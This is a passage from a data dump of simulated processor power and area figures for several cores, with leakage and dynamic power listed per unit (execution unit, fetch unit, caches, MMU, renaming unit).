'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0126369,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0370172,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0895761,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.69781,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.337399,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.304241,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.19708,
'Instruction Fetch Unit/Runtime Dynamic': 0.78087,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0691229,
'L2/Runtime Dynamic': 0.0155229,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.94892,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.32537,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0877333,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0877334,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.36491,
'Load Store Unit/Runtime Dynamic': 1.84577,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.216335,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.432671,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0767781,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0775335,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.354269,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0561491,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.645502,
'Memory Management Unit/Runtime Dynamic': 0.133683,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 23.3878,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.30499e-05,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0177725,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.179941,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.197727,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.54777,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0491579,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.2413,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.263306,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.11315,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.182507,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0921235,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.387781,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.089042,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.46218,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0497441,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00474603,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528114,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0350998,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.102556,
'Execution Unit/Register Files/Runtime Dynamic': 0.0398458,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.123551,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.307737,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.38204,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000320225,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000320225,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000293949,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000122015,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000504212,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00143861,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00253315,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0337424,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.14631,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.0771094,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.114604,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.46899,
'Instruction Fetch Unit/Runtime Dynamic': 0.229428,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0454475,
'L2/Runtime Dynamic': 0.00371366,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.58709,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.652747,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0436748,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0436747,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.79333,
'Load Store Unit/Runtime Dynamic': 0.911811,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.107695,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.215389,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0382212,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0389018,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.133449,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0126465,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.355216,
'Memory Management Unit/Runtime Dynamic': 0.0515483,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.7146,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.130855,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0066975,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.055548,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.1931,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.77164,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.091538,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.147647,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0745275,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.313713,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.104693,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.02762,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00383952,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0277647,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0283956,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0277647,
'Execution Unit/Register Files/Runtime Dynamic': 0.0322351,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0584924,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.170512,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.12453,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00048232,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00048232,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000424014,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000166283,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000407905,
